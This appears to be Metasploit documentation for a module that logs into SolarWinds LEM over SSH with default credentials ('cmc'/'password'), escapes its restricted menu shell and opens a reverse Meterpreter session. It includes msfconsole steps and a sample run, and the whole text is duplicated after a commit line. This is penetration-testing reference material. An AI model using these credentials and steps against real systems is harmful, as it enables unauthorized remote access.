documentation/modules/exploit/linux/ssh/solarwinds_lem_exec.md

## Vulnerable Application

This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH service is accessed with the default username and password which is "cmc" and "password". By exploiting a vulnerability that exist on the menuing script, an attacker can escape from restricted shell.

Vulnerable application can be download as a free trial from vendor webpage.
[http://www.solarwinds.com/log-event-manager](http://www.solarwinds.com/log-event-manager)

## Verification Steps

  1. Start msfconsole
  2. Do: `use exploit/linux/ssh/solarwinds_lem_exec`
  3. Do: `set rhost <ip>`
  4. Do: `set lhost <ip>`
  5. Do: `exploit`
  6. You should get a shell.

## Scenarios

This is a run against a known vulnerable Solarwinds LEM server.
```
msf exploit(solarwind_lem_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] 12.0.0.154:32022 - Attempt to login...
[+] SSH connection is established.
[*] Requesting pty... We need it in order to interact with menuing system.
[+] Pty successfully obtained.
[*] Requesting a shell.
[+] Remote shell successfully obtained.
[+] Step 1 is done. Managed to access terminal menu.
[+] Step 2 is done. Managed to select 'service' sub menu.
[+] Step 2 is done. Managed to select 'service' sub menu.
[+] Step 3 is done. Managed to start 'restrictssh' function.
[+] Step 4 is done. We are going to try escape from jail shell.
[+] Sweet..! Escaped from jail.
[*] Delivering payload...
[*] Sending stage (38651 bytes) to 12.0.0.154
[*] Meterpreter session 3 opened (12.0.0.1:4444 -> 12.0.0.154:43361) at 2017-03-17 21:59:05 +0300
[-] Exploit failed: Errno::EBADF Bad file descriptor
[*] Exploit completed, but no session was created.

msf exploit(solarwind_lem_exec) > sessions -i 1 
[*] Starting interaction with 1...

meterpreter > getuid
Server username: cmc
meterpreter > 
```
Add documentation 2017-03-23 12:49:50 +03:00			`## Vulnerable Application`

			`This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH service is accessed with the default username and password which is "cmc" and "password". By exploiting a vulnerability that exist on the menuing script, an attacker can escape from restricted shell.`

			`Vulnerable application can be download as a free trial from vendor webpage.`
			`[http://www.solarwinds.com/log-event-manager](http://www.solarwinds.com/log-event-manager)`

			`## Verification Steps`

			`1. Start msfconsole`
			2. Do: `use exploit/linux/ssh/solarwinds_lem_exec`
			3. Do: `set rhost <ip>`
			4. Do: `set lhost <ip>`
			5. Do: `exploit`
			`6. You should get a shell.`

			`## Scenarios`

			`This is a run against a known vulnerable Solarwinds LEM server.`
			```
			`msf exploit(solarwind_lem_exec) > exploit`

			`[*] Started reverse TCP handler on 12.0.0.1:4444`
			`[*] 12.0.0.154:32022 - Attempt to login...`
			`[+] SSH connection is established.`
			`[*] Requesting pty... We need it in order to interact with menuing system.`
			`[+] Pty successfully obtained.`
			`[*] Requesting a shell.`
			`[+] Remote shell successfully obtained.`
			`[+] Step 1 is done. Managed to access terminal menu.`
			`[+] Step 2 is done. Managed to select 'service' sub menu.`
			`[+] Step 2 is done. Managed to select 'service' sub menu.`
			`[+] Step 3 is done. Managed to start 'restrictssh' function.`
			`[+] Step 4 is done. We are going to try escape from jail shell.`
			`[+] Sweet..! Escaped from jail.`
			`[*] Delivering payload...`
			`[*] Sending stage (38651 bytes) to 12.0.0.154`
			`[*] Meterpreter session 3 opened (12.0.0.1:4444 -> 12.0.0.154:43361) at 2017-03-17 21:59:05 +0300`
			`[-] Exploit failed: Errno::EBADF Bad file descriptor`
			`[*] Exploit completed, but no session was created.`

			`msf exploit(solarwind_lem_exec) > sessions -i 1`
			`[*] Starting interaction with 1...`

			`meterpreter > getuid`
			`Server username: cmc`
			`meterpreter >`
			```